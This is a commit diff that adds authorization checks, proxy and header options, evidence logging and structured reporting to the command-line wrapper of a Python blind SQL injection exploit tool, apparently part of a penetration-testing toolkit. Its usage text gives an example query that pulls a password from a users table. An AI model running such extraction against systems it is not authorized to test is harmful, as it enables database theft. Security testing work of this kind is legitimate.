更新: 359 个文件 - 2026-03-16 23:30:01
这个提交包含在:
hao
@@ -33,6 +33,24 @@ import urllib.parse
|
||||
from concurrent.futures import ThreadPoolExecutor, as_completed
|
||||
from typing import Callable, Optional, List
|
||||
import sys
|
||||
from pathlib import Path
|
||||
import contextlib
|
||||
import io
|
||||
|
||||
|
||||
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
|
||||
if str(SCRIPTS_DIR) not in sys.path:
|
||||
sys.path.insert(0, str(SCRIPTS_DIR))
|
||||
|
||||
from tool_contract import ( # noqa: E402
|
||||
add_common_args,
|
||||
emit_report,
|
||||
ensure_authorized,
|
||||
make_report,
|
||||
parse_cookie_string,
|
||||
parse_headers,
|
||||
write_evidence,
|
||||
)
|
||||
|
||||
|
||||
class Colors:
|
||||
@@ -332,8 +350,10 @@ def main():
|
||||
)
|
||||
parser.add_argument("--true-indicator", help="布尔盲注真值指示器")
|
||||
parser.add_argument("-t", "--threads", type=int, default=1, help="线程数")
|
||||
add_common_args(parser)
|
||||
|
||||
args = parser.parse_args()
|
||||
ensure_authorized(args, parser)
|
||||
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
|
||||
@@ -344,12 +364,7 @@ def main():
|
||||
k, v = pair.split("=", 1)
|
||||
data[k] = v
|
||||
|
||||
cookies = {}
|
||||
if args.cookie:
|
||||
for pair in args.cookie.split(";"):
|
||||
if "=" in pair:
|
||||
k, v = pair.strip().split("=", 1)
|
||||
cookies[k] = v
|
||||
cookies = parse_cookie_string(args.cookie)
|
||||
|
||||
exploit = BlindSQLi(
|
||||
url=args.url,
|
||||
@@ -360,32 +375,81 @@ def main():
|
||||
delay=args.delay,
|
||||
threads=args.threads,
|
||||
)
|
||||
exploit.session.headers.update(parse_headers(args.header))
|
||||
if args.proxy:
|
||||
exploit.session.proxies.update({"http": args.proxy, "https": args.proxy})
|
||||
if args.format != "text":
|
||||
exploit._print = lambda *_args, **_kwargs: None # type: ignore[assignment]
|
||||
|
||||
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
|
||||
print(f"{Colors.BOLD}Blind SQL Injection Exploit Tool{Colors.END}")
|
||||
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
|
||||
result = None
|
||||
stdout_buffer = io.StringIO()
|
||||
capture = contextlib.redirect_stdout(stdout_buffer) if args.format != "text" else contextlib.nullcontext()
|
||||
|
||||
if args.query:
|
||||
result = exploit.extract_string(
|
||||
args.query, args.technique, args.dbms, true_indicator=args.true_indicator
|
||||
)
|
||||
print(f"\n{Colors.GREEN}[+] 结果: {result}{Colors.END}")
|
||||
with capture:
|
||||
if args.query:
|
||||
result = exploit.extract_string(
|
||||
args.query, args.technique, args.dbms, true_indicator=args.true_indicator
|
||||
)
|
||||
|
||||
elif args.extract:
|
||||
result = exploit.auto_extract(args.extract, args.dbms, args.technique)
|
||||
print(f"\n{Colors.GREEN}[+] {args.extract}: {result}{Colors.END}")
|
||||
elif args.extract:
|
||||
result = exploit.auto_extract(args.extract, args.dbms, args.technique)
|
||||
|
||||
else:
|
||||
print(
|
||||
f"{Colors.YELLOW}请使用 --query 或 --extract 指定要提取的数据{Colors.END}"
|
||||
)
|
||||
print(f"\n示例:")
|
||||
print(f" --extract user 提取当前用户")
|
||||
print(f" --extract database 提取当前数据库")
|
||||
print(f" --extract version 提取数据库版本")
|
||||
print(f' --query "SELECT password FROM users LIMIT 1"')
|
||||
if args.format == "text":
|
||||
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
|
||||
print(f"{Colors.BOLD}Blind SQL Injection Exploit Tool{Colors.END}")
|
||||
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
|
||||
if args.query:
|
||||
print(f"\n{Colors.GREEN}[+] 结果: {result}{Colors.END}")
|
||||
elif args.extract:
|
||||
print(f"\n{Colors.GREEN}[+] {args.extract}: {result}{Colors.END}")
|
||||
else:
|
||||
print(
|
||||
f"{Colors.YELLOW}请使用 --query 或 --extract 指定要提取的数据{Colors.END}"
|
||||
)
|
||||
print(f"\n示例:")
|
||||
print(f" --extract user 提取当前用户")
|
||||
print(f" --extract database 提取当前数据库")
|
||||
print(f" --extract version 提取数据库版本")
|
||||
print(f' --query "SELECT password FROM users LIMIT 1"')
|
||||
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}\n")
|
||||
|
||||
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}\n")
|
||||
evidence_refs = []
|
||||
ref = write_evidence(
|
||||
args,
|
||||
"blind-sqli-result.json",
|
||||
{
|
||||
"result": result,
|
||||
"captured_stdout": stdout_buffer.getvalue()[-1000:],
|
||||
"technique": args.technique,
|
||||
"dbms": args.dbms,
|
||||
},
|
||||
)
|
||||
if ref:
|
||||
evidence_refs.append(ref)
|
||||
status = "verified" if result else "needs-review"
|
||||
severity = "high" if result else "medium"
|
||||
report = make_report(
|
||||
tool="blind-sqli",
|
||||
mode=f"{args.technique}-blind-extraction",
|
||||
target=args.url,
|
||||
status=status,
|
||||
severity=severity,
|
||||
payload_or_probe={"query": args.query, "extract": args.extract, "result": result},
|
||||
request_summary={"param": args.param, "dbms": args.dbms, "threads": args.threads},
|
||||
evidence_refs=evidence_refs,
|
||||
destructive_risk="medium",
|
||||
args=args,
|
||||
)
|
||||
text_lines = [
|
||||
"=" * 60,
|
||||
"Blind SQL Injection Exploit Tool",
|
||||
"=" * 60,
|
||||
f"Target: {args.url}",
|
||||
f"Technique: {args.technique}",
|
||||
f"Result Present: {'yes' if result else 'no'}",
|
||||
f"Status: {status}",
|
||||
]
|
||||
emit_report(args, report, text_lines)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
在新工单中引用
屏蔽一个用户